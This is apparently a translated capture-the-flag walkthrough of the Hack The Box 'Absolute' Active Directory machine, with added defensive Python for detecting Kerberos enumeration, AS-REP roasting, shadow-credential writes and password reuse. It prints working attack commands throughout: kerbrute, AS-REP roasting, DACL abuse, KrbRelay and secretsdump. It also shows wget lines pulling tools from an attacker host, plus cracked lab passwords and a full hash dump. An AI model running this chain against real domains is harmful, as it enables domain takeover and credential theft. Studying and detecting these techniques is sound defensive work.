Basic information

Port scan

Port 80 plus the usual domain-controller ports:

$ nmap -sC -sV -Pn 10.10.11.181
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-27 13:53 CST
Nmap scan report for 10.10.11.181
Host is up (0.19s latency).
Not shown: 988 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Absolute
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-12-27 12:54:19Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2022-12-27T12:55:14+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.absolute.htb
| Not valid before: 2022-06-09T08:14:24
|_Not valid after: 2023-06-09T08:14:24
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.absolute.htb
| Not valid before: 2022-06-09T08:14:24
|_Not valid after: 2023-06-09T08:14:24
|_ssl-date: 2022-12-27T12:55:12+00:00; +7h00m01s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2022-12-27T12:55:14+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.absolute.htb
| Not valid before: 2022-06-09T08:14:24
|_Not valid after: 2023-06-09T08:14:24
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.absolute.htb
| Not valid before: 2022-06-09T08:14:24
|_Not valid after: 2023-06-09T08:14:24
|_ssl-date: 2022-12-27T12:55:12+00:00; +7h00m01s from scanner time.
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2022-12-27T12:55:05
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 6h59m59s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 109.34 seconds

80

Nothing much here:

The image EXIF metadata yields some full names:

James Roberts
Michael Chaffrey
Donald Klay
Sarah Osvald
Jeffer Robinson

kerberos enum

Kerberos user enumeration returns usernames, some of which match the full names from the image EXIF data, so a more complete username list can be generated by following the same naming convention:

./kerbrute_linux_amd64 userenum --dc absolute.htb -d absolute.htb /usr/share/wordlists/kerberos_enum_userlists/A-Z.Surnames.txt

2022/12/06 21:13:10 > [+] VALID USERNAME: J.ROBINSON@absolute.htb
2022/12/06 21:13:10 > [+] VALID USERNAME: J.ROBERTS@absolute.htb
2022/12/06 21:13:37 > [+] VALID USERNAME: L.MOORE@absolute.htb
2022/12/06 21:14:01 > [+] VALID USERNAME: N.SMITH@absolute.htb
2022/12/06 21:15:05 > [+] VALID USERNAME: S.JOHNSON@absolute.htb

users.txt

J.ROBINSON@absolute.htb
J.ROBERTS@absolute.htb
L.MOORE@absolute.htb
N.SMITH@absolute.htb
S.JOHNSON@absolute.htb
M.Chaffrey@absolute.htb
D.Klay@absolute.htb
S.Osvald@absolute.htb

ASREP Roasting

AS-REP Roasting yields D.Klay's hash, which cracks to the password:

python3 ~/Tools/impacket/examples/GetNPUsers.py absolute.htb/ -no-pass -usersfile users.txt

$krb5asrep$23$D.Klay@absolute.htb@ABSOLUTE.HTB:b228229f01fed39738c60439ff9a3d02$84c4256df2622e0f458948f46bd593aee704c15942840a9914af5cbd8698a25f44966149d8f6834c2d888e1d96100649e26a26945cda8fe2e80cf7cb4c16cf8977a8cca3f6670509a5cfbf88f76f87b4303170fb50f1c8af41d8b8d6b9b57e2243d0f11daf0486ea8bc55e565b88caa32c36b84af7b9c51d82fe20262b3b41ae458dab1eb038b78f699c23e1d49d20fa9b88262039e23d8ffe565a33c66cee3273ff195349579757312cafeb63b25bbebcf662c26162fb3c2d4c3519fcbcd291b8120fa6eec8aba7bc0c0df993b1f7ca291f7cbe277ea90cb64af6a75bf0a9a5dd99b85b21895e5623ee663e

sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Darkmoonsky248girl ($krb5asrep$23$D.Klay@absolute.htb@ABSOLUTE.HTB)
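Both of the steps above (kerbrute walking a wordlist and GetNPUsers.py asking for a TGT without pre-authentication) leave a distinctive trace on the domain controller: Windows Security event 4768 records the result code, pre-authentication type and ticket encryption type of every TGT request. The Python below is an added example for defenders, not code from the original writeup; the event records, client addresses, timestamps and wordlist names are constructed, and only the account names come from the box.

```python
"""Detection logic for Kerberos user enumeration and AS-REP roasting,
run over constructed Windows Security event 4768 records.
Added example, not part of the original writeup; client IPs, timestamps
and the probed names are assumed for illustration."""
from collections import defaultdict

# Event 4768 field values (RFC 4120 error code, pre-auth and encryption types)
KDC_ERR_C_PRINCIPAL_UNKNOWN = 0x6    # "client not found in Kerberos database"
PREAUTH_NONE = 0                     # TGT issued without pre-auth: DONT_REQ_PREAUTH account
PREAUTH_ENC_TIMESTAMP = 2            # ordinary password-based pre-authentication
ETYPE_RC4_HMAC = 0x17                # RC4 ticket, the $krb5asrep$23$ format cracked above
ETYPE_AES256 = 0x12
ETYPE_NONE = 0xFFFFFFFF              # value the DC logs on failed requests


def _event(ts, account, client, result, preauth, etype):
    return {"ts": ts, "account": account, "client": client,
            "result": result, "preauth": preauth, "etype": etype}


# Constructed sample telemetry (timestamps in seconds, IPs assumed)
EVENTS = [
    # one host walks a surname wordlist: six unknown principals within six seconds
    *[_event(i, name, "10.10.14.5", KDC_ERR_C_PRINCIPAL_UNKNOWN, None, ETYPE_NONE)
      for i, name in enumerate(["A.ADAMS", "B.BAKER", "C.CLARK",
                                "D.DAVIS", "E.EVANS", "F.FOX"])],
    # the same host then obtains a TGT for D.Klay with no pre-auth and an RC4 ticket
    _event(40, "D.Klay", "10.10.14.5", 0x0, PREAUTH_NONE, ETYPE_RC4_HMAC),
    # a workstation: one typo, then a normal AES logon with timestamp pre-auth
    _event(100, "j.robert", "10.10.10.20", KDC_ERR_C_PRINCIPAL_UNKNOWN, None, ETYPE_NONE),
    _event(104, "J.Roberts", "10.10.10.20", 0x0, PREAUTH_ENC_TIMESTAMP, ETYPE_AES256),
]


def detect_user_enumeration(events, threshold=5, window=60):
    """Return {client: total_unknown} for clients that produced at least
    `threshold` KDC_ERR_C_PRINCIPAL_UNKNOWN results inside any `window`-second
    span. A user mistyping a name yields one or two; a wordlist yields a burst."""
    by_client = defaultdict(list)
    for e in events:
        if e["result"] == KDC_ERR_C_PRINCIPAL_UNKNOWN:
            by_client[e["client"]].append(e["ts"])
    flagged = {}
    for client, times in by_client.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):          # sliding window over sorted timestamps
            while t - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged[client] = len(times)
                break
    return flagged


def detect_asrep_roasting(events):
    """Return sorted (account, client) pairs for successful TGT requests that
    used no pre-authentication and received an RC4 ticket, the combination a
    DONT_REQ_PREAUTH account produces. Domain-joined clients negotiate AES."""
    return sorted({(e["account"], e["client"]) for e in events
                   if e["result"] == 0x0 and e["preauth"] == PREAUTH_NONE
                   and e["etype"] == ETYPE_RC4_HMAC})


if __name__ == "__main__":
    print("enumeration:", detect_user_enumeration(EVENTS))   # {'10.10.14.5': 6}
    print("AS-REP roast:", detect_asrep_roasting(EVENTS))    # [('D.Klay', '10.10.14.5')]
```

The fix on the directory side is to clear "Do not require Kerberos preauthentication" on every account that has it set and to disable RC4 for the domain; the detection stays useful for catching the request pattern even when an account has to keep the flag.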

d.klay

Request a ticket as d.klay and continue with the ticket:

python3 ~/Tools/impacket/examples/getTGT.py 'absolute.htb/d.klay:Darkmoonsky248girl'
export KRB5CCNAME=d.klay.ccache

Use crackmapexec to pull LDAP information; the description field of one account discloses the svc_smb password:

~/Tools/CrackMapExec/cme ldap -u d.klay -d absolute.htb -k --kdcHost dc.absolute.htb --users 10.10.11.181

LDAP 10.10.11.181 389 DC svc_smb AbsoluteSMBService123!
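The weakness here is a credential stored in the LDAP description attribute, which every authenticated domain user can read. As an added example for defenders (not code from the original writeup), the Python below audits a set of user entries for that pattern. The entries are constructed: svc_smb's description is assumed to be the bare password shown in the cme output, and the other descriptions are invented.

```python
"""Audit LDAP user 'description' attributes for embedded credentials.
Added example, not part of the original writeup; directory entries are
constructed and the heuristics are deliberately simple."""
import re

# a credential-related word anywhere in the text
KEYWORD = re.compile(r"\b(pass(word|wd)?|pwd|cred(ential)?s?|secret|login)\b", re.I)
# a single token of 8+ non-space chars mixing upper, lower and digits: looks like
# a password rather than prose (version strings can trigger it, so review hits)
PASSWORD_LIKE = re.compile(r"(?=\S*[A-Z])(?=\S*[a-z])(?=\S*\d)\S{8,}")

# Constructed sample entries (in a real audit, the output of an LDAP search
# for sAMAccountName and description over the Users container)
ENTRIES = [
    {"sAMAccountName": "svc_smb", "description": "AbsoluteSMBService123!"},
    {"sAMAccountName": "J.Roberts", "description": "Finance department"},
    {"sAMAccountName": "svc_audit", "description": "Network audit collector, contact IT"},
    {"sAMAccountName": "c.colt", "description": "Initial pwd set by helpdesk"},
    {"sAMAccountName": "winrm_user", "description": ""},
    {"sAMAccountName": "Guest",
     "description": "Built-in account for guest access to the computer/domain"},
]


def audit_descriptions(entries):
    """Return [(sAMAccountName, [reasons])] for entries whose description
    contains a credential keyword or a password-looking token."""
    findings = []
    for entry in entries:
        text = entry.get("description") or ""
        reasons = []
        match = KEYWORD.search(text)
        if match:
            reasons.append(f"credential keyword '{match.group(0)}'")
        for token in PASSWORD_LIKE.findall(text):
            reasons.append(f"password-like token '{token}'")
        if reasons:
            findings.append((entry["sAMAccountName"], reasons))
    return findings


if __name__ == "__main__":
    for account, reasons in audit_descriptions(ENTRIES):
        print(account, "->", "; ".join(reasons))
```

The same check is worth running over the info and comment attributes, which are equally readable and equally popular as scratch space.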

SMB

After obtaining a ticket for the SMB account, the SMB shares can be accessed:

impacket-getTGT 'absolute.htb/svc_smb:AbsoluteSMBService123!'
export KRB5CCNAME=svc_smb.ccache
impacket-smbclient svc_smb@dc.absolute.htb -k -no-pass

test.exe

Retrieve the test.exe file and run it on a Windows machine connected to the VPN, capturing its traffic with Wireshark. At first only DNS requests appear; after updating the hosts file the LDAP bind becomes visible (the username format it uses has to be adjusted to match the earlier convention), as shown in the capture below. New credentials are found:

absolute.htb\m.lovegod:AbsoluteLDAP2022!

m.lovegod

Now there is finally a normal domain user account; request a ticket in the same way and enumerate further:

impacket-getTGT absolute.htb/m.lovegod:AbsoluteLDAP2022!
export KRB5CCNAME=m.lovegod.ccache

The Python LDAP enumeration supports only these authentication types: GSSAPI, GSS-SPNEGO, EXTERNAL, DIGEST-MD5. The official bloodhound-python did not yet support Kerberos, so this fork was used instead:

python3 bloodhound.py -u m.lovegod -k -d absolute.htb -dc dc.absolute.htb -ns 10.10.11.181 --dns-tcp --zip -no-pass -c All

From the collected data we learn: m.lovegod – owns –> Group Network Audit – Generic Write –> winrm_user

winrm_user

I got stuck here; according to the writeup you have to set up your own Windows Server to do this.

(Mainly because at the time BloodHound only provided Windows commands, and a Windows machine is more convenient to operate; versions after 4.3.1 now also provide Linux abuse commands.)

  • Set up a Windows Server; I used 2019
  • Install the ActiveDirectory module
  • Add a hosts file entry for absolute.htb, but do not add dc.absolute.htb; let it resolve on its own.
  • Change the Internet time server to absolute.htb
  • Change the network adapter's DNS server to the target DC IP
  • Then run the following commands, and be quick about it! The DC resets the AD values very regularly, so prepare everything ready to copy and paste
  • On the Windows Server, add the user m.lovegod to the "Network Audit" group
$dc_domain="ABSOLUTE.HTB"
$SecPassword = ConvertTo-SecureString "AbsoluteLDAP2022!" -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('ABSOLUTE.HTB\m.lovegod', $SecPassword)
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Network Audit" -Rights all -DomainController DC.ABSOLUTE.HTB -principalidentity "m.lovegod"
Add-ADPrincipalGroupMembership -Identity m.lovegod -MemberOf 'Network Audit' -Credential $Cred -Server DC.ABSOLUTE.HTB
Get-DomainGroupMember -Identity 'network audit' -Domain $dc_domain -DomainController DC.ABSOLUTE.HTB -Credential $cred

Method using only impacket (not the official release; be careful not to break your local environment):

# Modify group rights to all
impacket-dacledit absolute.htb/m.lovegod:AbsoluteLDAP2022! -k -target-dn 'DC=absolute,DC=htb' -dc-ip 10.10.11.181

# Add user to group
impacket-owneredit -k absolute.htb/m.lovegod:AbsoluteLDAP2022! -dc-ip 10.10.11.181 -action write -new-owner 'm.lovegod' -target 'Network Audit'

# Check if user has been added
impacket-dacledit absolute.htb/m.lovegod:AbsoluteLDAP2022! -k -target-dn 'DC=absolute,DC=htb' -dc-ip 10.10.11.181 -action read -principal 'm.lovegod' -target 'Network Audit'

After the user m.lovegod has been added to the "Network Audit" group, on Kali:

ntpdate -s absolute.htb && impacket-getTGT absolute.htb/m.lovegod:AbsoluteLDAP2022!
export KRB5CCNAME=m.lovegod.ccache
python3 ~/tools/pywhisker/pywhisker.py -d absolute.htb -u "m.lovegod" -k --no-pass -t "winrm_user" --action "add"

# Method using certipy-ad, more convenient
KRB5CCNAME=m.lovegod.ccache certipy shadow auto -username m.lovegod@absolute.htb -account winrm_user -k -target dc.absolute.htb
...
[*] Saved credential cache to 'winrm_user.ccache'
...
[*] NT hash for 'winrm_user': 8738c7413a5da3bc1d083efc0ab06cb2

The pywhisker command above should produce a pfx file and a password. Then use PKINITtools with the pfx to obtain a ticket:

python3 ~/tools/PKINITtools/gettgtpkinit.py absolute.htb/winrm_user -cert-pfx <pfx> -pfx-pass <password> winrm_user_ccache

Note that a credential cache has been generated for winrm_user. Then edit the /etc/krb5.conf file to make sure the realm names are all in uppercase.

# Ensure the realms in /etc/krb5.conf are in UPPERCASE
[libdefaults]
default_realm = ABSOLUTE.HTB

[realms]
ABSOLUTE.HTB = {
kdc = DC.ABSOLUTE.HTB
admin_server = ABSOLUTE.HTB
}

Use evil-winrm with the ccache file to get a shell

export KRB5CCNAME=winrm_user_ccache
ntpdate -s absolute.htb && evil-winrm -i DC.ABSOLUTE.HTB -r ABSOLUTE.HTB

user flag

The user flag is on winrm_user's desktop:

Privilege escalation

Preconditions met

Basic steps:

# download and compile the three tools and upload to the target
# https://github.com/cube0x0/KrbRelay
# https://github.com/antonioCoco/RunasCs
# https://github.com/GhostPack/Rubeus/

wget http://<ip>/KrbRelay.exe -O .\KrbRelay.exe
wget http://<ip>/RunasCs_net4.exe -O .\RunasCs_net4.exe
wget http://<ip>/Rubeus.exe -O .\Rubeus.exe

Use the uploaded tools to relay the request to the COM server as SYSTEM

# /network 9
C:\Users\winrm_user\Documents\RunasCs_net4.exe m.lovegod 'AbsoluteLDAP2022!' -d absolute.htb -l 9 "C:\Users\winrm_user\Documents\KrbRelay.exe -spn ldap/dc.absolute.htb -clsid {752073A1-23F2-4396-85F0-8FDB879ED0ED} -shadowcred"

# Method that adds the user directly to Administrators
*Evil-WinRM* PS C:\programdata> .\RunasCs.exe m.lovegod 'AbsoluteLDAP2022!' -d absolute.htb -l 9 ".\KrbRelay.exe -spn ldap/dc.absolute.htb -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -add-groupmember administrators winrm_user"

This produces a Rubeus.exe command; running it yields the NTLM hash of DC$

.\Rubeus.exe asktgt /user:DC$ /certificate:<cert> /password:"<pass>" /getcredentials /show

NTLM : A7864AB463177ACB9AEC553F18F42577

Note the NTLM hash and use secretsdump to obtain all hashes via DC$

impacket-secretsdump -hashes :A7864AB463177ACB9AEC553F18F42577 'DC$@ABSOLUTE.HTB'

KrbRelayUp

*Evil-WinRM* PS C:\programdata> .\RunasCs.exe m.lovegod 'AbsoluteLDAP2022!' -d absolute.htb -l 9 ".\KrbRelayUp.exe relay -m shadowcred -cls {354ff91b-5e49-4bdc-a8e6-1cb6c6877182}"
# The output of this run contains the certificate and its password; use Rubeus again in the same way
*Evil-WinRM* PS C:\programdata> .\Rubeus.exe asktgt /user:DC$ /certificate:MIIK******GmkJ4CAgfQ /password:"tW6@oE8=tX0@" /getcredentials /show /nowrap
# This yields the DC$ machine account hash; secretsdump as before
# It is also possible to log in directly with the hash; the normal users cannot use NTLM because they are in the Protected Users group
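Every step from the Network Audit ACL change onward is a write to the directory that the DC itself audits: the owner/DACL rewrite on the group, the msDS-KeyCredentialLink values added to winrm_user (pywhisker, certipy shadow) and to DC$ (the KrbRelay/KrbRelayUp shadowcred step, in which the DC's own machine account is relayed to LDAP and writes its own object), and the optional direct addition of winrm_user to Administrators. The Python below is an added example for defenders, not code from the original writeup; the events are constructed to mirror Windows Security events 5136 (directory service object modified) and 4728/4732/4756 (member added to a group), the object DNs are assumed, and "svc_whfb" is an assumed provisioning identity that legitimately writes key credentials.

```python
"""Detection for sensitive directory writes and privileged group additions,
run over constructed Windows Security 5136 and 4728/4732/4756 records.
Added example, not part of the original writeup; DNs, the svc_whfb identity
and the event shapes are assumed."""

SENSITIVE_ATTRS = {"msDS-KeyCredentialLink", "nTSecurityDescriptor"}
PRIVILEGED_GROUPS = {"Administrators", "Domain Admins", "Enterprise Admins",
                     "Schema Admins", "Account Operators", "Backup Operators"}
GROUP_ADD_EVENTS = {4728, 4732, 4756}   # global, domain-local, universal group


def _rdn(dn):
    """First RDN value of a DN: 'CN=DC,OU=...' -> 'DC'."""
    return dn.split(",", 1)[0].split("=", 1)[1]


def _account(subject):
    """'ABSOLUTE\\DC$' -> 'DC' (domain prefix and machine-account '$' dropped)."""
    return subject.split("\\")[-1].rstrip("$")


# Constructed sample events in the order the chain above produces them
EVENTS = [
    {"id": 5136, "subject": "ABSOLUTE\\m.lovegod", "attribute": "msDS-KeyCredentialLink",
     "operation": "Value Added", "object": "CN=winrm_user,CN=Users,DC=absolute,DC=htb"},
    {"id": 5136, "subject": "ABSOLUTE\\DC$", "attribute": "msDS-KeyCredentialLink",
     "operation": "Value Added", "object": "CN=DC,OU=Domain Controllers,DC=absolute,DC=htb"},
    {"id": 5136, "subject": "ABSOLUTE\\m.lovegod", "attribute": "nTSecurityDescriptor",
     "operation": "Value Added", "object": "CN=Network Audit,CN=Users,DC=absolute,DC=htb"},
    # assumed legitimate provisioning identity registering a key for a user
    {"id": 5136, "subject": "ABSOLUTE\\svc_whfb", "attribute": "msDS-KeyCredentialLink",
     "operation": "Value Added", "object": "CN=J.Roberts,CN=Users,DC=absolute,DC=htb"},
    {"id": 4732, "subject": "ABSOLUTE\\DC$", "member": "ABSOLUTE\\winrm_user",
     "group": "Administrators"},
    {"id": 4728, "subject": "ABSOLUTE\\Administrator", "member": "ABSOLUTE\\svc_audit",
     "group": "Network Audit"},
]


def detect_sensitive_writes(events, allowed_writers=frozenset()):
    """Return [(reason, subject, object_dn)] for 5136 'Value Added' events on
    SENSITIVE_ATTRS whose subject is not an allow-listed provisioning identity."""
    findings = []
    for e in events:
        if e["id"] != 5136 or e.get("operation") != "Value Added":
            continue
        if e["attribute"] not in SENSITIVE_ATTRS or e["subject"] in allowed_writers:
            continue
        if e["attribute"] == "msDS-KeyCredentialLink":
            if _account(e["subject"]).lower() == _rdn(e["object"]).lower():
                reason = "self-write of msDS-KeyCredentialLink (machine account relayed to LDAP)"
            else:
                reason = "msDS-KeyCredentialLink written on another principal (shadow credentials)"
        else:
            reason = "nTSecurityDescriptor rewritten (owner/DACL change)"
        findings.append((reason, e["subject"], e["object"]))
    return findings


def detect_privileged_group_adds(events, allowed_subjects=frozenset()):
    """Return [(subject, member, group)] for additions to PRIVILEGED_GROUPS."""
    return [(e["subject"], e["member"], e["group"]) for e in events
            if e["id"] in GROUP_ADD_EVENTS and e["group"] in PRIVILEGED_GROUPS
            and e["subject"] not in allowed_subjects]


if __name__ == "__main__":
    for finding in detect_sensitive_writes(EVENTS, allowed_writers={"ABSOLUTE\\svc_whfb"}):
        print(*finding)
    print(detect_privileged_group_adds(EVENTS))
```

Event 5136 is only emitted when a SACL on the container requests auditing of attribute writes, so the audit policy has to be in place before these rules produce anything. Requiring LDAP signing and channel binding on the DC removes the relay path itself, and the Protected Users membership noted above is what blocks NTLM for the ordinary users here.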

root flag

With the Administrator hash, pass-the-hash:

evil-winrm -i 10.10.11.181 -u Administrator -H 1f4a6093623653f6488d5aa24c75f2ea

hash

Administrator\Administrator:500:aad3b435b51404eeaad3b435b51404ee:1f4a6093623653f6488d5aa24c75f2ea:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3ca378b063b18294fa5122c66c2280d4:::
J.Roberts:1103:aad3b435b51404eeaad3b435b51404ee:7d6b7511772593b6d0a3d2de4630025a:::
M.Chaffrey:1104:aad3b435b51404eeaad3b435b51404ee:13a699bfad06afb35fa0856f69632184:::
D.Klay:1105:aad3b435b51404eeaad3b435b51404ee:21c95f594a80bf53afc78114f98fd3ab:::
s.osvald:1106:aad3b435b51404eeaad3b435b51404ee:ab14438de333bf5a5283004f660879ee:::
j.robinson:1107:aad3b435b51404eeaad3b435b51404ee:0c8cb4f338183e9e67bbc98231a8e59f:::
n.smith:1108:aad3b435b51404eeaad3b435b51404ee:ef424db18e1ae6ba889fb12e8277797d:::
m.lovegod:1109:aad3b435b51404eeaad3b435b51404ee:a22f2835442b3c4cbf5f24855d5e5c3d:::
l.moore:1110:aad3b435b51404eeaad3b435b51404ee:0d4c6dccbfacbff5f8b4b31f57c528ba:::
c.colt:1111:aad3b435b51404eeaad3b435b51404ee:fcad808a20e73e68ea6f55b268b48fe4:::
s.johnson:1112:aad3b435b51404eeaad3b435b51404ee:b922d77d7412d1d616db10b5017f395c:::
d.lemm:1113:aad3b435b51404eeaad3b435b51404ee:e16f7ab64d81a4f6fe47ca7c21d1ea40:::
svc_smb:1114:aad3b435b51404eeaad3b435b51404ee:c31e33babe4acee96481ff56c2449167:::
svc_audit:1115:aad3b435b51404eeaad3b435b51404ee:846196aab3f1323cbcc1d8c57f79a103:::
winrm_user:1116:aad3b435b51404eeaad3b435b51404ee:8738c7413a5da3bc1d083efc0ab06cb2:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:a7864ab463177acb9aec553f18f42577:::
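A dump in this format is also what a defender gets back from a password audit of their own domain, and the checks worth running on it are mechanical: accounts whose NT hash is the hash of the empty password, accounts that still store an LM hash, and groups of accounts sharing one NT hash (password reuse across service accounts). The Python below is an added example, not code from the original writeup; it reuses six lines of the dump above as sample input, and the svc_backup line is constructed to exercise the reuse check.

```python
"""Password-hygiene checks over secretsdump-format output.
Added example, not part of the original writeup; the sample reuses lines
from the dump above plus one constructed 'svc_backup' line."""
from collections import defaultdict

EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM field when LM hashes are not stored

SAMPLE = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
Administrator\\Administrator:500:aad3b435b51404eeaad3b435b51404ee:1f4a6093623653f6488d5aa24c75f2ea:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3ca378b063b18294fa5122c66c2280d4:::
svc_smb:1114:aad3b435b51404eeaad3b435b51404ee:c31e33babe4acee96481ff56c2449167:::
winrm_user:1116:aad3b435b51404eeaad3b435b51404ee:8738c7413a5da3bc1d083efc0ab06cb2:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:a7864ab463177acb9aec553f18f42577:::
svc_backup:1117:aad3b435b51404eeaad3b435b51404ee:c31e33babe4acee96481ff56c2449167:::
""".splitlines()   # last line constructed: reuses svc_smb's hash to show reuse detection


def parse_secretsdump(lines):
    """Parse 'name:rid:lm:nt:::' lines; skips impacket status lines ('[*] ...').
    A 'DOMAIN\\name' prefix is reduced to the bare account name."""
    records = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("["):
            continue
        parts = line.split(":")
        if len(parts) < 4:
            continue
        records.append({"name": parts[0].split("\\")[-1], "rid": int(parts[1]),
                        "lm": parts[2].lower(), "nt": parts[3].lower()})
    return records


def empty_password_accounts(records):
    """Accounts whose NT hash equals the hash of the empty string."""
    return [r["name"] for r in records if r["nt"] == EMPTY_NT]


def lm_hashes_present(records):
    """Accounts that still have a real (crackable) LM hash stored."""
    return [r["name"] for r in records if r["lm"] != EMPTY_LM]


def shared_nt_hashes(records):
    """{nt_hash: [names]} for non-empty hashes used by more than one account."""
    by_hash = defaultdict(list)
    for r in records:
        by_hash[r["nt"]].append(r["name"])
    return {h: names for h, names in by_hash.items()
            if len(names) > 1 and h != EMPTY_NT}


if __name__ == "__main__":
    recs = parse_secretsdump(SAMPLE)
    print("empty passwords:", empty_password_accounts(recs))   # ['Guest']
    print("LM hashes stored:", lm_hashes_present(recs))        # []
    print("shared hashes:", shared_nt_hashes(recs))
```

Guest is disabled by default, so its empty hash is expected; the finding matters only for an enabled account. Hashes and RIDs are compared as strings and integers respectively, so the parser works unchanged on the full-domain output.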

References